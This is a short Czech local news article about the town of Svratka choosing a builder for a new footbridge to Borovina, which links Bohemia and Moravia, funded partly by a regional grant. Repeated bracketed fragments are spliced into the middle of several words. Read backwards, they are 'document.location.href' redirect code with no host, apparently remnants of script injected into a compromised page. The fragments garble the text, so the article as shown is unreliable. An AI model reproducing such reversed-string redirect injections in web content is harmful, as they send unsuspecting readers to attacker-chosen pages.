Rainbow page separator

Lidé budou moci využívat novou lávku

Čtvrtek, 23. dubna 2015

Svratka / Zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele nové lávky do Boroviny už vybrali ve Svratce. Původní přemostění spojující Čechy a Moravu nebylo léta zlegalizováno, navíc nesplňovalo bezpečnost provozu a při možných povodních svislé prvky konstrukce lávky zasahovaly do koryta řeky.
„Většinou jsme lávku vždy při vyšší hladině vody museli strhnout. Mnohdy byla řeka rychlejší než my. Po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom hrozilo i přehrazení a následné ucpání [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toku,“ uvedl starosta Svratky František Mládek.
Na stavbu nové lávky bude podle jeho slov použita dotace, kterou se na ni svratecké radnici podařilo získat. Jedná se o dotaci z Programu obnovy venkova Vysočiny ve výši asi s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to šest tisíc korun, přičemž celkové náklady na vybudování nové lávky by neměly přesáhnout dvě stě padesát tisíc korun.